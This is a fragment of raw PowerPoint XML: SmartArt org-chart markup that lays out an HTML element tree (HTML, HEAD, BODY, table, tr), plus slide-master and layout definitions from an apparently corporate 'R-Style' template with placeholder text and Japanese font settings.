    <dgm:cxn modelId="{26960813-6DF0-B34F-A9FA-AEEE21C0F200}" type="presParOf" srcId="{0481505C-A4FD-644E-8EBC-AE8337D37ED7}" destId="{D12FAA72-0AC0-7A4D-BF19-E8008D51844E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{BC5724D1-5159-9A47-A333-1C6A498FDEAB}" type="presParOf" srcId="{D12FAA72-0AC0-7A4D-BF19-E8008D51844E}" destId="{685ED81D-DEA9-F64A-A5F8-0AF93ED8F57C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{E1D16557-A7FB-C648-9FFB-294AA9F1BBDE}" type="presParOf" srcId="{685ED81D-DEA9-F64A-A5F8-0AF93ED8F57C}" destId="{13EF2B23-A66B-0F43-A2CB-D201631A959E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{219F3913-45F3-F247-AA45-C6ED6CEC7903}" type="presParOf" srcId="{685ED81D-DEA9-F64A-A5F8-0AF93ED8F57C}" destId="{41823341-73F1-AF49-8EE3-4E5451567D78}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{DCAE9287-EB5E-D54C-BF74-59C2F00E4654}" type="presParOf" srcId="{D12FAA72-0AC0-7A4D-BF19-E8008D51844E}" destId="{4BD95848-641E-4E47-B23D-B8A866E58700}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{A722D502-3B06-264B-BB6F-E1ECB297DCC5}" type="presParOf" srcId="{4BD95848-641E-4E47-B23D-B8A866E58700}" destId="{3FFF1E71-92C8-CA40-957E-DBE66CA0F3E4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{13287000-8399-5F42-B3A0-057317688AD7}" type="presParOf" srcId="{4BD95848-641E-4E47-B23D-B8A866E58700}" destId="{FC22F6CA-C3DA-A14F-A95A-95A6B7601B8B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{F1C78F30-0AA2-D144-B310-C290F4929441}" type="presParOf" srcId="{FC22F6CA-C3DA-A14F-A95A-95A6B7601B8B}" destId="{59B915C1-B9AC-334E-BF6B-164E65855948}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{A4DE4D57-7403-EF45-8C63-E403D582B1F8}" type="presParOf" srcId="{59B915C1-B9AC-334E-BF6B-164E65855948}" destId="{FC788842-39A8-6645-BB6A-93903D700FB0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{CE9F31A8-1254-5E40-A6A9-355D0E4F7DD2}" type="presParOf" srcId="{59B915C1-B9AC-334E-BF6B-164E65855948}" destId="{92ED51D8-6EBE-FD41-BE1B-703549CC18EB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{78BB56BF-9A6D-FB4E-AF83-F35AB9C63CAD}" type="presParOf" srcId="{FC22F6CA-C3DA-A14F-A95A-95A6B7601B8B}" destId="{8CE307F6-19AB-6040-9FD1-3045E823A4C6}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{EE64C07B-6CFF-0346-8CEE-9836B9B9C3FC}" type="presParOf" srcId="{FC22F6CA-C3DA-A14F-A95A-95A6B7601B8B}" destId="{D9C58911-B86C-6C41-B01F-6BD708281A57}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{D6312B80-6486-C741-A35A-1DFDA70D1761}" type="presParOf" srcId="{4BD95848-641E-4E47-B23D-B8A866E58700}" destId="{3C8612DF-F386-BE41-9002-4C8335C67C5E}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{829024EE-53E3-ED4B-AFAF-2198DA46A31D}" type="presParOf" srcId="{4BD95848-641E-4E47-B23D-B8A866E58700}" destId="{3D11641A-31ED-D548-A479-C971990FA7FB}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{AD6732B2-931B-544B-ABA6-4E1D691196F2}" type="presParOf" srcId="{3D11641A-31ED-D548-A479-C971990FA7FB}" destId="{8AB1F1DE-31FA-C545-AC94-C21A076F0E16}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{C9D79D02-8BC3-2345-BD40-69CE4AAB8E47}" type="presParOf" srcId="{8AB1F1DE-31FA-C545-AC94-C21A076F0E16}" destId="{9409ED1A-6906-F545-A107-5BB5E14939EA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{D78FB92A-8027-AE45-BFB2-CCF7A146196D}" type="presParOf" srcId="{8AB1F1DE-31FA-C545-AC94-C21A076F0E16}" destId="{8F0F2B17-F149-FE4B-9D54-F18A8714902E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{A4AF84BA-FFB5-3449-BAFD-4050AAA8D631}" type="presParOf" srcId="{3D11641A-31ED-D548-A479-C971990FA7FB}" destId="{101FB5CF-9DF4-A345-9751-CABF3418B3E7}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{9725E494-DCED-3041-AAEF-9116B61106DD}" type="presParOf" srcId="{101FB5CF-9DF4-A345-9751-CABF3418B3E7}" destId="{CF66580A-8492-604F-825F-4917FFDE1EC2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{0D8192E5-C8E8-1948-9FBE-9B04EF116067}" type="presParOf" srcId="{101FB5CF-9DF4-A345-9751-CABF3418B3E7}" destId="{D7B95026-5563-2F46-823D-C6C388EC8093}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{CD9A80AF-B7C3-5D41-B70A-5226A2ECAA70}" type="presParOf" srcId="{D7B95026-5563-2F46-823D-C6C388EC8093}" destId="{0DC8692D-E6CE-9640-8CFE-317CD8D408E0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{C6429A19-20D2-A24C-9AFC-37FE641E0577}" type="presParOf" srcId="{0DC8692D-E6CE-9640-8CFE-317CD8D408E0}" destId="{67E443CB-C0BD-7742-A8F1-5EAD8198E6FC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{A0B6469E-1C54-9A4F-B0BA-8169EF7EA924}" type="presParOf" srcId="{0DC8692D-E6CE-9640-8CFE-317CD8D408E0}" destId="{C0166688-0173-5045-BE42-1E1D8CDB5C4E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{FFA69082-B599-FB45-A493-387E72D9498B}" type="presParOf" srcId="{D7B95026-5563-2F46-823D-C6C388EC8093}" destId="{A371136B-3D92-0A49-AE0F-BEEDDCFD3B09}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{528026C0-ADE4-AF4F-B225-38CE67BF61C0}" type="presParOf" srcId="{A371136B-3D92-0A49-AE0F-BEEDDCFD3B09}" destId="{3E8F150B-0FF1-5742-A182-613080DB019A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{FE525DAD-46EB-1043-8E25-5DA71455412A}" type="presParOf" srcId="{A371136B-3D92-0A49-AE0F-BEEDDCFD3B09}" destId="{E374E8CF-787B-3548-A8F5-6DA58C534CC0}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{D1EE8BB0-2918-CC49-A0AF-CBA00C09A331}" type="presParOf" srcId="{E374E8CF-787B-3548-A8F5-6DA58C534CC0}" destId="{A06F5121-3BEC-3240-9139-889BBBAEB10D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{2CD60343-CBE4-5A46-81D2-FA788A2380CC}" type="presParOf" srcId="{A06F5121-3BEC-3240-9139-889BBBAEB10D}" destId="{59AAFF16-3B9B-8048-811F-22D77D73DD5D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{9FB5D405-CEF5-A049-9AE6-28271AFA3A88}" type="presParOf" srcId="{A06F5121-3BEC-3240-9139-889BBBAEB10D}" destId="{ABE32562-42DF-064B-86D8-024958091BDC}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{B12570BB-0A6E-9749-8DD9-70B5C81A1B71}" type="presParOf" srcId="{E374E8CF-787B-3548-A8F5-6DA58C534CC0}" destId="{4F8DF796-B7B4-6A46-859F-E840E079E028}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{B7EAA4EC-6782-AE40-8C23-EF5C5438FAB4}" type="presParOf" srcId="{4F8DF796-B7B4-6A46-859F-E840E079E028}" destId="{328D3843-4BAF-C44E-B5C2-291C2A69EABB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{1BDAE7A9-CE95-BD45-87F7-1BA12C7F6B00}" type="presParOf" srcId="{4F8DF796-B7B4-6A46-859F-E840E079E028}" destId="{B6E9E4F0-4F98-C24A-B21A-4BDD84675BD0}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{460F1A72-F509-0D42-93A3-80163A0D2EDE}" type="presParOf" srcId="{B6E9E4F0-4F98-C24A-B21A-4BDD84675BD0}" destId="{924F631F-A817-6748-BF6B-DA03E0C88955}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{44488FB2-DC0D-F543-A8C1-781E19CD46F8}" type="presParOf" srcId="{924F631F-A817-6748-BF6B-DA03E0C88955}" destId="{F4313D17-1E6A-154F-9B75-A8545E5A0C2D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{7032E8AE-171E-4D47-BD86-0CDB5F1BB4E5}" type="presParOf" srcId="{924F631F-A817-6748-BF6B-DA03E0C88955}" destId="{6723BE12-3A36-204C-B7C0-340C4B2D15C1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{D5B8145B-019B-014D-B523-4184AE750B0D}" type="presParOf" srcId="{B6E9E4F0-4F98-C24A-B21A-4BDD84675BD0}" destId="{A739A15A-C4F5-1045-BCE6-E6885A8D6815}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{E43A295A-219F-2842-A74D-E21E30642D5A}" type="presParOf" srcId="{B6E9E4F0-4F98-C24A-B21A-4BDD84675BD0}" destId="{0BA7588A-34EB-9842-9156-F9639A1F30AC}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{792CB1A4-F9E7-DE4C-9055-B10BF45F7BFB}" type="presParOf" srcId="{E374E8CF-787B-3548-A8F5-6DA58C534CC0}" destId="{32C222DC-6803-9F40-A356-66B669B11923}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{72575901-9C2D-CA41-B709-1BFD1A0642AC}" type="presParOf" srcId="{D7B95026-5563-2F46-823D-C6C388EC8093}" destId="{F0D06A52-A835-694C-B207-A595CE6B613A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{E39046BA-D1AB-6B47-A2BB-7609D45DF2E9}" type="presParOf" srcId="{3D11641A-31ED-D548-A479-C971990FA7FB}" destId="{C52AF1E6-D70D-4540-9BE6-0578F352160B}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{0A162141-6486-5743-ABF0-016948E643AF}" type="presParOf" srcId="{D12FAA72-0AC0-7A4D-BF19-E8008D51844E}" destId="{BA935205-239A-0143-882A-05C6E8B0A8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D3843-4BAF-C44E-B5C2-291C2A69EABB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1653472" y="2828250"/>
          <a:ext cx="212443" cy="282534"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="212443" y="282534"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0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F150B-0FF1-5742-A182-613080DB019A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2295753" y="2285145"/>
          <a:ext cx="91440" cy="231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311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6580A-8492-604F-825F-4917FFDE1EC2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2295753" y="1441029"/>
          <a:ext cx="91440" cy="249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612DF-F386-BE41-9002-4C8335C67C5E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1622192" y="596914"/>
          <a:ext cx="719281" cy="249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33"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="719281" y="124833"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="719281" y="249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FF1E71-92C8-CA40-957E-DBE66CA0F3E4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="902911" y="596914"/>
          <a:ext cx="719281" cy="249667"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="719281" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="719281" y="124833"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="124833"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="249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F2B23-A66B-0F43-A2CB-D201631A959E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1027745" y="2467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&lt;HTML&gt;</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1027745" y="2467"/>
        <a:ext cx="1188894" cy="594447"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FC788842-39A8-6645-BB6A-93903D700FB0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="308464" y="846582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&lt;HEAD&gt;</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="308464" y="846582"/>
        <a:ext cx="1188894" cy="594447"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9409ED1A-6906-F545-A107-5BB5E14939EA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1747026" y="846582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&lt;BODY&gt;</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1747026" y="846582"/>
        <a:ext cx="1188894" cy="594447"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{67E443CB-C0BD-7742-A8F1-5EAD8198E6FC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1747026" y="1690697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&lt;table&gt;</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1747026" y="1690697"/>
        <a:ext cx="1188894" cy="594447"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{59AAFF16-3B9B-8048-811F-22D77D73DD5D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1747026" y="2516337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&lt;tr&gt;</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1747026" y="2516337"/>
        <a:ext cx="1188894" cy="594447"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F4313D17-1E6A-154F-9B75-A8545E5A0C2D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="464577" y="2531026"/>
          <a:ext cx="1188894" cy="5944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&lt;tr&gt;</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="464577" y="2531026"/>
        <a:ext cx="1188894" cy="594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F4CB37-F97B-4530-B4E6-0474AB733BE3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CEFC6-48AA-42E0-883A-0337C9337E3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8064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129ED-E021-412F-A6BB-F29022CB135E}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" smtClean="0"/>
              <a:t>2019/10/14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CC46-C8F2-4731-96DE-09F55333740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322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9222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02983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245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630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924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99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563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813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548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9474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C4CC46-C8F2-4731-96DE-09F55333740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5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-1"/>
            <a:ext cx="12192000" cy="565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34963" y="5838625"/>
            <a:ext cx="2356362" cy="864000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 16"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079999" y="1365250"/>
            <a:ext cx="10052457" cy="144564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3201" b="1" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="メイリオ" panose="020B0604030504040204" pitchFamily="50" charset="-128"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>R-Style template</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t> v3.0</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="コンテンツ プレースホルダー 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1080000" y="3107530"/>
            <a:ext cx="4170488" cy="1592068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" indent="0" algn="l" defTabSz="30847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 sz="2000" b="1" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Oct 1, 2018</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Rakuten Taro</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>xxxxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t> Dept.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Rakuten, Inc.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43858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g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1" name="テキスト ボックス 10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9" name="コンテンツ プレースホルダー 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:ph sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="334965" y="1028859"/>
            <a:ext cx="1152207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3739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gra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 hasCustomPrompt="1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4" y="1028859"/>
            <a:ext cx="11522074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64" y="6456535"/>
            <a:ext cx="1047886" cy="127020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43714FD7-6AD5-1B4C-95BA-BB0FB7D2AEA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4336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g_re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title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="334963" y="321684"/>
            <a:ext cx="11522075" cy="5396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</a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Click to add title</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="テキスト ボックス 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11104119" y="6377806"/>
            <a:ext cx="764398" cy="2808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7624" tIns="47624" rIns="47624" bIns="47624" numCol="1" spcCol="38100" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="54839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86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="en-US" altLang="ja-JP" sz="1200" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="548391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ja-JP" altLang="en-US" sz="1200" b="1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メイリオ" panose="020B0604030504040204" pitchFamily="50" charset="-128"/>
              <a:cs typeface="メイリオ" panose="020B0604030504040204" pitchFamily="50" charset="-128"/>
              <a:sym typeface="ヒラギノ角ゴ ProN W3"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="コンテンツ プレースホルダー 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="334963" y="1028859"/>
            <a:ext cx="11533553" cy="516123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defRPr sz="1867" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="360018" indent="-240012">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:defRPr sz="1600" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="72003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3pPr>
            <a:lvl4pPr marL="108005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4pPr>
            <a:lvl5pPr marL="1440072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5pPr>
            <a:lvl6pPr marL="1800090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6pPr>
            <a:lvl7pPr marL="2160108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7pPr>
            <a:lvl8pPr marL="2520126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8pPr>
            <a:lvl9pPr marL="2880144" indent="-240012">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Click to add object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408" y="6452051"/>
            <a:ext cx="1047750" cy="127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F82B00-2742-9246-93A9-69359E0EAF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4963" y="636966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66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full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pic" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="0"/>
            <a:ext cx="12193587" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91439" tIns="45719" rIns="91439" bIns="45719" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Click icon to add full image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2554598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97C0AEEE-698E-F348-89FD-E33AED85BF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939823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ack-cover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F90AA9F3-25D2-9D4A-8350-BF8D3E2B06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794" y="2843942"/>
            <a:ext cx="30480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223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334964" y="324000"/>
            <a:ext cx="11522074" cy="53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6" tIns="71436" rIns="71436" bIns="71436" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Title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64" r:id="rId3"/>
    <p:sldLayoutId id="2147483665" r:id="rId4"/>
    <p:sldLayoutId id="2147483660" r:id="rId5"/>
    <p:sldLayoutId id="2147483667" r:id="rId6"/>
    <p:sldLayoutId id="2147483666" r:id="rId7"/>
  </p:sldLayoutIdLst>
  <p:transition spd="med"/>
  <p:hf hdr="0" ftr="0" dt="0"/>
  <p:txStyles>
    <p:title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メイリオ"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2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titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="0" marR="0" indent="0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1pPr>
      <a:lvl2pPr marL="464374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2pPr>
      <a:lvl3pPr marL="631073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3pPr>
      <a:lvl4pPr marL="797772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4pPr>
      <a:lvl5pPr marL="964470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5pPr>
      <a:lvl6pPr marL="1131169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6pPr>
      <a:lvl7pPr marL="1297868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7pPr>
      <a:lvl8pPr marL="1464566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8pPr>
      <a:lvl9pPr marL="1631265" marR="0" indent="-297676" algn="l" defTabSz="308475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kumimoji="1" sz="24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j-cs"/>
          <a:sym typeface="メイリオ"/>
        </a:defRPr>
